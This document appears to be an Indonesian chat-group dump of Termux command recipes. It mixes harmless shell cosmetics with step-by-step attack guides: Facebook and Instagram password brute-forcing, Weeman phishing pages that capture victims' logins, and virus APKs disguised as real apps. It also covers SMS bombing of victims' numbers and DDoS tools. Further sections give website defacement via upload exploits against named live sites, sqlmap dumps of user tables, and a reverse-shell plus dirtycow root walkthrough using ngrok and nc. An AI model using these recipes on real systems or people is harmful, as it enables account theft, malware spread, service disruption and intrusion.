1.[Script Termux] -Cmatrix *apt-get update *apt-get upgrade *apt-get install nmap *apt-get install python *apt-get install list *apt-get install cmatrix *cmatrix [1/11 18.28] ‪+62 821-2770-8489‬: ✓Mempercantik Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py Hack FB ngincer $ apt update ( Enter ) $ apt upgrade ( Enter ) $ apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) Hack Gmail apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd wifi-hacker $ls $chmod +x wifi-hacker.sh $ls $./wifi-hacker.sh ✓ *ni tutor dari gua* TOOL TERMUX LENGKAP ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ Command Termux Hacking...... by:🎭ঔৣஓMuslimCyberSquadঔৣஓீ🎭 ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ cara uninstall tool termux rm -rf toolsnya Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy CHATTING VIA TERMUX irssi /connet irc.freenode.net /nick w3wandroid /join #modol $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam PERKIRAAN cuaca curl http://wttr.in/ (lokasi) Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya Menampilkan animasi kereta :v $ pkg install sl $ sl menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya MEMUTAR MUSIC DI YOUTUBE VIA TERMUX $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dengan mengetik nomornya musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak music CRACK PASSWORD HASH $ git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ $ cd FHX-Hash-Killer $ python2 FHXHashKiller.py $ git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py ASCII ART MAPS​​​ - pkg install update && upgrade - pkg install perl - git clone https://github.com/x-xsystm/maps.git - cd maps - perl maps.pl - untuk Zoom tekan ​A​ - Password: ​(pejuang212)​ CARA MENGHIAS TAMPILAN TERMUX TOXIC TEAM $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ pkg install ncurses-utils $ pkg install ruby $ pkg install lolcat $ pkg install cowsay $ gem install lolcat $ nano .bashrc clear blue='\e[1;34m' green='\e[1;32m' purple='\e[1;35m' cyan='\e[1;36m' red='\e[1;31m' white='\e[1;37m' yellow='\e[1;33m' NOW=`date "+%d.%m.%Y"` TIME=`date "+%H:%M"` cowsay -f eyes **Welcome To TOXIC hacking tool** | lolcat toilet -f standard " **TOXIC** " -F gay neofetch echo " Time : " $TIME | lolcat date | lolcat echo echo Username : Cyber | lolcat echo Hostname : TOXIC | lolcat echo echo @localhost:~# | lolcat echo root@localhost:~$ | lolcat echo -e $green echo root@CYBER:~$ TUTORIAL MEMBUAT VIRUS SEPERTI APLIKASI ASLINYA Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done BOOM SPAM DI TERMUX apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default aja Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (Install *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh LITESPAM $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... Spammer GRAB $pkg install python2 $pip2 install requests $pkg install git $git clone http://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $python2 spammer.py nomor hp korban --delay 30 ‌spam sms jdid 1.PKG install PHP 2.pkg install cURL 3.curl https://pastebin.com/raw/9BYy1 JVc -o jdid.php 4.php jdid.php Hacking spammer by seni $apt update && apt upgrade $apt install python2 php $pip2 install requests $apt install nano $apt install git $git clone https://github.com/Senitopeng/ SpamSms.git $cd SpamSms $python2 mantan.py HACKING DAN TRICK FB VIA TERMUX AUTO BOOT FACEBOOK $ git clone https://github.com/Senitopeng/BotFbBangDjon.git $ cd BotFbBangDjon $ python2 bangdjon.py Cara crack id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction HACKING THOOLS MBF FACEBOOK $ pkg update && upgrade ‬$ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/pirmansx/mbf $ cd mbf $ python2 MBF.py (HACKING FB LEWAT TERMUX) $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ dip2 install mechanize $ cd/sterage/emulated/0 $ python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $ storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung BRUTEFORCE $ apt update $ apt upgrade $ apt install python $ apt install pip $ pip install wordlist $ apt install worlist $ Wordlist -h $ cd /sdcard $ Cat pas.txt FACEBOOK BRUTO FORCE $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ pip2 install mechanize $ cd/storage/emulated/0 $ python2 fbbrute.py $ storage/emulated/0/password.txt Hacking tool weeman $ apt-get update $ apt-get upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/evait-security/weeman.git $ ls $ cd weeman $ ls $ python2 weeman.py $ show $set url https://www.facebook.com $set action_url https://www.facebook.com $ show buka new season (new tab) /lembar ke 2 $ ifconfig jika slesai copy no addres yg tertera. jngn sampai salah karna ada 2 addres disitu. jika tdk tau yg mna tanya. stelah copy no adres. buka lembar pertama lagi tulis $ run kasih adres tdi ke target. contoh 125.25.175.88:8080 ingt hrus ksh port > :8080 jika sudah dibuka dngn dia. saat dia login nnti. email. pass. tertera. serta data" akun target.... hacking fbbrute2 by decsec $ apt update (enter) $ apt upgrade (enter) $ apt install python2 (enter) $ apt install wget (enter) $ pip2 install mechanize (enter) $ cd /sdcard (enter) $ mkdir facebrute (enter) $ cd facebrute (enter) $ wget http://override.waper.co/files/facebook.apk $ wget http://override.waper.co/files/password.apk $ mv facebook.apk facebook.py (enter) $ mv password.apk password.txt (enter) $ python2 facebook.py (enter) #Selesai *note: Untuk masalah wordlist bisa buat sendiri kok ^^. Buat sendiri lebih efektif... hacking fbbrute3 $ Apt update ( Enter ) $ Apt upgrade ( Enter ) $ Apt install python2 ( Enter ) $ Pip2 install urllib3 chardet certifi idna requests( Enter ) $ Apt install openssl curl ( Enter ) $ Pkg install libcurl ( Enter ) $ Ln -s/sdcard ( Enter ) $ cd sdcard ( Enter ) $ Python2 fb.py ( Enter ) Hacking Botkomena fb $pkg update && pkg upgrade $pkg install git $pkg install python2 $pip2 install mechanize $git clone https://github.com/Senitopeng/ Botkomena.git $cd Botkomena $python2 botkomena.py Cara Install OSIF ( Open Source Information Facebook ) $ pkg install python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF $ pip2 install -r requirements.txt Dan cara menjalankannya menggunakan perintah : python2 osif.py weemen 1.download dulu termux 2.instal termux :V 3.ketik apt install git python2 4.ketik git clone https://github.com/evait-security/weeman.git 5.ketik cd weeman 6.ketik python2 weeman.py kalau udh ke install seperti ini 1.ketik set url https://m.facebook.com 2.ketik set action_url https://m.facebook.com/login 3.ketik run Kalau sudah begini . ketik 127.0.0.1:8080 pada browser maka web pishing yg di buat tadi sudah jadi lalu lemparkan ke target link 127.0.0.1:8080 lalu kalau korban terjebak , di mana email dan password nya ? masuk dalam termux jangan di tutup weeman tidak hanya dapat di gunakan sebagai media pishing facebook saja. kita juga dapat membuat web pishing situs lainya misalnya twitter instagram dll asal memiliki/terdapat form input Hacking instagram $ apt update && apt upgrade -y $ apt install nodejs git $ cd Instagram-Private-Tools $ node index.js $ git clone https://github.com/ccocot/Instagram-Private-Tools.git $ npm install *HACK INSTAGRAM* ( sosial engineering) $ apt update && apt upgrade $ pkg install python $ pkg install git $ pkg install nano $ git clone https://github.com/avramit/instahack.git $ ls $ cd instahack $ ls $ pip install requests $ cd instahack $ nano pass.txt $ cat pass.txt $ ls $ python hackinsta.py Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com Lacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak TOOL DDOS VIA TERMUX 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py RED_HAWK tool $ apt update $ apt install git $ git clone https://github.com/Tuhinshubhra/RED_HAWK $ cd RED_HAWK $ chmod +x rhawk.php $ apt install php $ ls $ php rhawk.php ‌```Install webdav ``` $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav ‌Tutorial Install *Tools-B4J1N64Nv5* pkg install update pkg install git pkg install toilet pkg install figlet pip2 install lolcat git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 cd B4J1N64Nv5 sh B4J1N64N.sh ‌cara install termux ubuntu - apt update/pkg update - apt upgrade/pkg upgrade - pkg install git - pkg install proot - pkg install wget - git clone https://github.com/Neo-Oli/termux-ubuntu - cd termux-ubuntu - chmod +x ubuntu.sh - pip install -r requirements.txt - ./ubuntu.sh Untuk menjalankan - ./start.sh Cara install github tembak XL Dari awal 1.pkg upgrade 2.pkg update 3.pkg install git 4.pkg install python 5.git clone https://github.com/albertoanggi/xl-py 6.pip install -r requirements.txt 7.chmod +x app.py 8.python/python2 app.py *Install admin finder in termux* $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/AdheBolo/AdminFinder *Menjalankan* $ ls $ cd AdminFinder $ chmod 777 AdminFinder.py $ python2 AdminFinder.py *Cara install tool Mr.Rv1.1* $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ ls $ python2 fsociety.py SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap https://github.com/sqlmapproject/sqlmap.git cd sqlmap Python2 sqlmap.py Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run TOOL D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py DEFACE Hacking Script-Deface $apt update $apt upgrade $apt install git $apt install python2 $git clone https://github.com/Ubaii/script-deface-creator $ls $cd script-deface-creator $ls $chmod +x create.py $ls $python2 create.py done semoga bisa bikin script Html CARA DEFACE Cara1 Siapkan script sendiri.. 1.buka browser kalian apa saja terserah lalu ke google 2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search 3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx 4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian 5.klik yang di bawah nya tunggu sampai loading selesai 6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search 7.selesai!! Cara2 Method/metode KCFinder Inurl:/kcfinder/browse.php Inurl:/Kcfinder/ Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html Contoh: https://basukiwater.com/kcfinder/browse.php jadi https://basukiwater.com/file/namasckamu.html cara3 Deface Onion.to File Upload Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut... Dork : - inurl:/upload site:.onion.to - intext:"Upload" site:.onion.to Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php Step By Step : 1. Dorking Dulu 2. Pilih Web Target 3. Pilih File yang mau di'upload 4. Tinggal klik Upload => Done 😆 Contoh Target : https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html https://danwin1210.me/uploads/lopeyou.html https://temp.xn--wda.fr/e719x8JgJ.html Mirror?! 😆 https://www.defacer.id/296011.html https://www.defacer.id/296024.html cara4 Metode com media Bahan : 1. Dork : - inurl:com_media site:com - inurl:com_media intext:"Upload" 2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 3. Upload'an : Format .txt 😁 Live Target : http://www.james-insurance.co.uk/ Step by Step : gunakan Live Targert dulu untuk Uji Coba 😁 1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk 2. Pilih salah satu Web 3. Masukkan Exploit http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 4. Lalu Upload file dalam tempat upload ( format .txt ) Akses shell ? Tambahkan : /images/namafile.txt contoh : http://www.james-insurance.co.uk/images/fac.txt Nanti Jadi Gini Hasilnyaa.. Mudah Bukan?! Tinggal Upload ke Defacer.id 😁 cara5 [POC] Vulnerability Simplicity Of Upload #Step 1: Dork: “Powered By: © Simplicity oF Upload” #Step 2: Exploit: http://[situstargetkamu]/PATH/upload.php *Tergantung dengan target. #Step 3: llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html) #Step 4: Preview: http://[situstargetkamu]/upload/[Your File] #Step 5: Live Demo: http://www.railfaneurope.net/pix/upload.php http://www.formplas.com/upload/upload.php *Di google masih banyak kok Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya. Kalau masih ada yang bin [8/11 06.41] ‪+62 838-5688-2861‬: TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target 192.168.1.1 set port 8080 set threads 10 masukkan exploitsnya set target 192.168.1.1 -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ 